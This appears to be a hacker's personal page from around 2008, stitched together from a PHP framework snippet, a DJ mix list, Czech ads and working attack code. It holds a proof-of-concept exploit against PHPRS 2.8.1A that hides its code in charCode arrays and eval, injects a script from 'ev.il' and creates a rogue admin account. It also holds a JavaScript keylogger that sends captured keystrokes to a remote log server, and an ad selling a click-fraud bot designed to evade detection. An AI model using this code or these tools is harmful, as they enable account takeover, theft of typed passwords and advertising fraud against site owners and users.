/*
    WEBTHESIGN 'OOP PHP5/SQL FRAMEWORK' USAGE EXAMPLE
    COPYRIGHT: WEBTHESIGN TEAM 2010
*/
class example_code_site {
    ////////////////////////////////////////////////////////////////////
    public function __construct () {
        /*---licence--------------------------------------------------*/
        $this->host = "example_code";
        $this->licence = "0605|1008|1602|6302";
        /*---licence--------------------------------------------------*/
        @include("./core/core.php");
        // core construction
        $this->core = new core($this);
        // core initialization
        $this->core->init();
        // load core classes
        $this->core->load();
        $this->build();
    }
    ////////////////////////////////////////////////////////////////////
    private function build () {
        // if admin > show backend
        $this->admin->admin();

        // main template load
        $tid = $this->template->load("index.tpl", $this);

        // template variables replacements

        // left-panel implementation
        $this->template->implement("left_menu", $this->producer->left_panel_menu(), $tid);
        $this->template->implement("left_content", $this->content->get(1, "left_panel"), $tid);
        $this->template->implement("admin_menu", $this->admin->menu(), $tid);
        $this->template->implement("admin_login", $this->admin->left_panel_login(), $tid);

        // main content implementation
        $this->template->implement("content", $this->handler->handle(), $tid);

        // right-panel implementation
        $this->template->implement("random_motorbikes", $this->motorbike->show_right_rand(), $tid);
        $this->template->implement("last_comments", $this->comment->last_comments(), $tid);
        $this->template->implement("right_content", $this->content->get(2, "right_panel"), $tid);

        // footer implementation
        $this->template->implement("footer_content", $this->content->get(3, "footer"), $tid);

        // final print
        print $this->template->render($tid, "final");
    }
    ////////////////////////////////////////////////////////////////////
}

/*
CLASSES:
        CORE/
            ADMIN
            AJAX
            CONFIG
            COOKIE
            CORE
            DATABASE
            DEBUG
            EMAIL
            FILE
            GENERATOR
            HANDLER
            IMAGE
            INSTALL
            LANGUAGE
            MENU
            MODULE
            RIGHT
            SEO
            TEMPLATE
            TOOL
            VALIDATION
            XHTML
        MODULES/
            ADVERTISEMENT
            ARTICLE
            CHAT
            COMMENT
            CATEGORY
            FAVOURITE
            GALLERY
            MOTORBIKE
            OFFER
            ORDER
            POLL
            PRODUCER
            RANKING
            RESERVATION
            STATISTICS
            USER
            VIDEO
            WYSIWYG_EDITOR
*/

do not attempt to reverse engineer this file, any attempt to do so is breaking the law! We will prosecute anyone we discover reverse engineering this code.”, sure… have fun

do not attempt !!!

PHPRS 2.8.1A XSRF POC EXPLOIT
VULN: REGISTRATION (readers.php), INPUTS 'rcelejmeno' && 'rmail'
VALUE: "-</td><script src=http://ev.il/xpl.js />"
EXPLOIT_DESCRIPTION: creating new admin account

function exploit () {
	// post data
	var pd = 'pruser=usr&prheslo=******&prheslo2=******&prjme'+
	'no=usr&prmail=usr@owned.ya&prurl=http://lol.cz'+
	'&prim=100000001&prblokace=0&prprava=2&prjazyk=cz&akce=AcAddUser'+
	'&modul=users';

	// xhr init function

	var xif = String.fromCharCode(102,117,110,99,116,105,111,110,32,99,
	114,101,97,116,101,82,101,113,117,101,115,116,79,98,106,101,99,116,
	32,40,41,32,123,118,97,114,32,114,101,113,59,105,102,32,40,119,105,
	110,100,111,119,46,88,77,76,72,116,116,112,82,101,113,117,101,115,
	116,41,32,123,114,101,113,32,61,32,110,101,119,32,88,77,76,72,116,
	116,112,82,101,113,117,101,115,116,40,41,59,125,32,101,108,115,101,
	32,105,102,40,119,105,110,100,111,119,46,65,99,116,105,118,101,88,
	79,98,106,101,99,116,41,32,123,114,101,113,32,61,32,110,101,119,32,
	65,99,116,105,118,101,88,79,98,106,101,99,116,40,34,77,105,99,114,
	111,115,111,102,116,46,88,77,76,72,84,84,80,34,41,59,125,32,101,108,
	115,101,32,123,114,101,116,117,114,110,32,102,97,108,115,101,59,125,
	114,101,116,117,114,110,32,114,101,113,59,125);

	// xhr post function
	var xpf = String.fromCharCode(102,117,110,99,116,105,111,110,32,112,
	111,115,116,32,40,112,97,103,101,44,32,100,97,116,97,41,32,123,118,
	97,114,32,104,116,116,112,32,61,32,99,114,101,97,116,101,82,101,113,
	117,101,115,116,79,98,106,101,99,116,40,41,59,100,97,116,97,32,61,
	32,100,97,116,97,32,43,32,34,38,81,61,34,32,43,32,77,97,116,104,46,
	114,97,110,100,111,109,40,41,59,104,116,116,112,46,111,112,101,110,
	40,39,80,79,83,84,39,44,32,112,97,103,101,44,32,116,114,117,101,41,
	59,104,116,116,112,46,115,101,116,82,101,113,117,101,115,116,72,101,
	97,100,101,114,40,34,67,111,110,116,101,110,116,45,116,121,112,101,
	34,44,32,34,97,112,112,108,105,99,97,116,105,111,110,47,120,45,119,
	119,119,45,102,111,114,109,45,117,114,108,101,110,99,111,100,101,
	100,34,41,59,104,116,116,112,46,115,101,116,82,101,113,117,101,115,
	116,72,101,97,100,101,114,40,34,67,111,110,116,101,110,116,45,108,
	101,110,103,116,104,34,44,32,100,97,116,97,46,108,101,110,103,116,
	104,41,59,104,116,116,112,46,115,101,116,82,101,113,117,101,115,116,
	72,101,97,100,101,114,40,34,67,111,110,110,101,99,116,105,111,110,
	34,44,32,34,99,108,111,115,101,34,41,59,104,116,116,112,46,111,110,
	114,101,97,100,121,115,116,97,116,101,99,104,97,110,103,101,32,61,
	32,102,117,110,99,116,105,111,110,40,41,32,123,105,102,40,104,116,
	116,112,46,114,101,97,100,121,83,116,97,116,101,32,61,61,32,52,32,
	38,38,32,104,116,116,112,46,115,116,97,116,117,115,32,61,61,32,50,
	48,48,41,32,123,114,101,116,117,114,110,32,116,114,117,101,59,125,
	125,59,104,116,116,112,46,115,101,110,100,40,100,97,116,97,41,59,
	104,116,116,112,46,115,101,110,100,40,110,117,108,108,41,59,125);

	eval(xif+xpf);
	post("admin.php", pd);
}
exploit();

Prodám perl script určený k automatizovanému “klikání” na nastavené webové adresy za účelem zvyšování pageranku, trafficu, plateb za reklamu, ovlivňování anket a podobně. Script obsahuje ajax webové konfigurační rozhraní v kterém je možné nastavovat adresy na které má script odesílat dotazy přes proxy servery. Dále program disponuje náhodným časováním akcí a přepínáním useragentů (za účelem zabránění detekce automatizace). Cenové nabídky posílejte na e-mail.

Prodám youtube parser/grabber,
Potřebujete nějakým způsobem automatizovaně pracovat s youtube obsahem ? Nabízím PHP5 OOP script který to řeší, umožňuje nastavit vyhledávané slovo, počet stránek které má procházet a připojování přes proxy servery. Z výsledků vyhledávání získává tyto informace: object embed code pro vlozeni videa na stranky, nadpis, popis, klíčová slova a počet zobrazení. Jedná se o pohodlný a rychlí způsob jak pracovat s youtube daty na svých webech (například automatizované CRON uploady nových videí na určitá klíčová slova apod …)

Parametry ~
jazyk: PHP 5 OOP
požadavek: server se zapnutymi PHP 5 sockety (CRON?)
velikost: 71,1 kB
časová náročnost:
- [inicializace] EXECUTION TIME: - 0.273270845413 seconds
- [načtení 2 videí] EXECUTION TIME: - 3.84409499168 seconds

ukazka

Dále redtube parser/grabber se stejnymi schopnostmi…
Po dohode neni problem implementovat do ruznych systemu, ceny dohodou.

MY DNB & BREAKCORE MIXES WITHOUT PRELISTENING CREATED IN NATIVE INSTRUMENTS TRAKTOR.
~nJOY

[4194][2k8]-2008-02-02_13h57m52
[4194][2k8]-2008-06-16_15h56m23
[4194][2k8]-2008-06-18_17h56m58
[4194][2k8]-2008-08-02_23h31m52
[4194][2k8]-2008-10-13_23h31m58
[4194]_xexe1e
[4194]_xexe2e
[4194]_xexe3e
[4194]-2007-12-11_21h28m08!!s
[4194]-2007-12-01_1h12m57!!s
[4194]-2007-11-01_3h29m44
[4194]-2007-12-22_22h02m08
[4194]-2007-11-12_21h49m15

 Loading ...

/*

 WTF:     SKOLA (SKOLA_PENTESTING) SIMPLE JAVASCRIPT KEYLOGGER
 AUTHOR:  [4194], CRUELTY
 http://skola.security-portal.cz/[4194]js_KeyLogger_v0x21.txt
 DATE:    19/02/2K8
 VERSION: 0.21

 RELEASES:
    0.1 - IFRAME REQUESTS      *COMPATIBLE [ OP ]
    0.2 - XMLHTTPREQUESTS      *COMPATIBLE [ OP ]
        0.21 - XMLHTTPREQUESTS *COMPATIBLE [ OP / FF / IE ]

 MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM
 MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMyomMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM
 MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMs:-+dMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM
 MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMNo-..-/hMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM
 MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMm+-..:--/yMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM
 MMMMMMMMMMMMMMMMMMMMMMMMMMMMMd/-..-:-../sNMMMMMMMMMMMMMMMMMMMMMMMMMMMM
 MMMMMMMMMMMMMMMMMMMMMMMMMMMMh:-.`.---.`-/oNMMMMMMMMMMMMMMMMMMMMMMMMMMM
 MMMMMMMMMMMMMMMMMMMMMMMMMMMs--.h..---.-m-:omMMMMMMMMMMMMMMMMMMMMMMMMMM
 MMMMMMMMMMMMMMMMMMMMMMMMMNo---mM...--.-Mm::+dMMMMMMMMMMMMMMMMMMMMMMMMM
 MMMMMMMMMMMMMMMMMMMMMMMMN/--/NMM...--.:MMN::+hMMMMMMMMMMMMMMMMMMMMMMMM
 MMMMMMMMMMMMMMMMMMMMMMMm:-.+MMMM...--.:MMMN:-+yMMMMMMMMMMMMMMMMMMMMMMM
 MMMMMMMMMMMMMMMMMMMMMMh--.yMMMMM-.---.:MMMMN/-+sMMMMMMMMMMMMMMMMMMMMMM
 MMMMMMMMMMMMMMMMMMMMMy---yMMMMMM-.---./MMMMMM/-/sNMMMMMMMMMMMMMMMMMMMM
 MMMMMMMMMMMMMMMMMMMMo---dMMMMMMM-.---./MMMMMMM+-/omMMMMMMMMMMMMMMMMMMM
 MMMMMMMMMMMMMMMMMMN+--:mMMMMMMMM-----./MMMMMMMMo./+dMMMMMMMMMMMMMMMMMM
 MMMMMMMMMMMMMMMMMm/--/ho+ooossss-----.:sssssoooy+./+hMMMMMMMMMMMMMMMMM
 MMMMMMMMMMMMMMMMd:--/odNdo:......---......../ymmys.:/sMMMMMMMMMMMMMMMM
 MMMMMMMMMMMMMMMh---yMd../ymNy+-.........:odNho:-dMh.:/oMMMMMMMMMMMMMMM
 MMMMMMMMMMMMMMs---dMMMm:`..:odNds:...+ymds/---:mMMMm-://NMMMMMMMMMMMMM
 MMMMMMMMMMMMMo--:mMMMMMN+..----+ymNdms/------/NMMMMMN/-/:mMMMMMMMMMMMM
 MMMMMMMMMMMN/--+NMMMMMMMN:.-----..mM:..------dMMMMMMMM+-/:dMMMMMMMMMMM
 MMMMMMMMMMm:--sMMMMMMds:...------.NM:.........-ohMMMMMMs-:-hMMMMMMMMMM
 MMMMMMMMMd:--yMMMmy+-....```-----.NM/............-+ymMMMh-:-yMMMMMMMMM
 MMMMMMMMh--:dMdo:...-..````-o:-...NM:.``-o-``.......-:sdMm-:-sMMMMMMMM
 MMMMMMMs--.o/..---...```:smMMN:...NM:``-mMMms/.``....----+s---+NMMMMMM
 MMMMMMo--...----..``./yNMMMMMMN/``NM:`:NMMMMMMNh+.``...----.`--/NMMMMM
 MMMMN/--..---..``.+hMMMMMMMMMMMM+`MM-/NMMMMMMMMMMMdo-``..----..-:mMMMM
 MMMm/--``.`.````/ssyyyyyyssssssso.ss-ssssssssssssssss+.```......::hMMM
 MMd:-----------::::::::::::::::::::-::-:----------------....-------yMM
 MMddddddhdhhhhhhhhhhhhhhhhhhhhhhhhyyyyyyyyyyyyyyyyyyyyyyyyyyyssyyysymM

  __
 |
   JEDNA SE O JEDNODUCHY JAVASCRIPTOVY KEYLOGGER LOGUJICI NA VZDALENY
   LOG SERVER PROSTREDNICTVIM XMLHTTPREQUESTU A LOKALNI PHP XSSPROXY
                                                                    __|

//[init]////////////////////////////////////////////////////////////////
var logserver="http://server-somewhere-in-d-corner-of-cyberjungle.tld/log.php";
var local_xss_proxy_path="./local/wateva/xssproxy.php";
var pack="";
//[KeyCapture]//////////////////////////////////////////////////////////
// fce reagujici na stisk klavesy
document.onkeypress = function (e){
    var keynum;
    if(window.event) { //IE
        keynum = window.event.keyCode;
    }else if(e){ // Netscape/Firefox/Opera
        keynum = e.which;
    }
    log=String.fromCharCode(keynum);
    keylog(log);
}
//onkeydown="submitenter(event)"
//[---]/////////////////////////////////////////////////////////////////
function keylog(log){
    pack=pack+log;
    if (pack.length==3){
        sendit(pack);
        pack="";
}	}
//[XHR]/////////////////////////////////////////////////////////////////
function createXMLHttpRequest() {
	if (window.XMLHttpRequest) {
		return new XMLHttpRequest();
	} else if (window.ActiveXObject) {
		try {
			return new ActiveXObject("Msxml2.XMLHTTP");
		} catch (e) {
			try {
				new ActiveXObject("Microsoft.XMLHTTP");
			} catch (e2) {
				return null;
		}	}
	} else {
		return null;
}	}
//[SEND]////////////////////////////////////////////////////////////////
function sendit(pack){
    var xhReq = createXMLHttpRequest();
    xhReq.open("GET", local_xss_proxy_path+"?target="+logserver+"&keylog="+pack, true);
    xhReq.onreadystatechange = function() {
        if (xhReq.readyState != 4) {
            return;
    }   };
    xhReq.send(null);
}
/*
//[logfile]/////////////////////////////////////////////////////////////
<?php
$keylog=htmlspecialchars(addslashes($_GET['keylog']));
$ip=htmlspecialchars(addslashes($_GET['ip']));
$ref=htmlspecialchars(addslashes($_GET['ref']));
$time=date("H:i:s | d.m.y");
$data="[ ".$time." ][ ".$ip." ][ ".$ref." ]".$keylog."\n";
// /lox/ musi byt zapisovatelny
$filename = "./lox/".$ip.".keylog";
$fd = fopen ($filename, "a");
$w= fwrite($fd, $data);
fclose ($fd);
?>
//[xssproxy]////////////////////////////////////////////////////////////
<!DOCTYPE html PUBLIC '-//W3C//DTD XHTML 1.1//EN'
'http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd'>
<html xmlns='http://www.w3.org/1999/xhtml' xml:lang='cs'>
<body>
<?php
class proxy {
    var $target;
    function get_response() {
        if (isset($this->target)) {
            $this->target;
            return htmlspecialchars($content = join (' ', file ($this->target)));
        }else{
            return null;
}   }	}
if (isset($_GET['target'])) {
    $target=htmlspecialchars(addslashes($_GET['target']));
    $keylog=htmlspecialchars(addslashes($_GET['keylog']));
    $proxy=new proxy;
    $proxy->target=$target."?keylog=".$keylog."&ip=".$_SERVER['REMOTE_ADDR']."&ref=".htmlspecialchars($_SERVER['HTTP_REFERER']);
    echo "<xssresponse> ".$proxy->get_response()."</xssresponse>";
}
?>
</body>
</html>
////////////////////////////////////////////////////////////////////////
                   .·´¯`·.¸    ¸.·´¯`·.
.·´¯`·.¸¸.·´¯°º¤ø,¸¸,.ø¤º°`EOF`°º¤ø.,¸¸,ø¤º°'°º¯`·.¸¸.·´¯`·.
               .·´¯`·.¸¸.·´   `·.¸¸.·´¯`·.

*/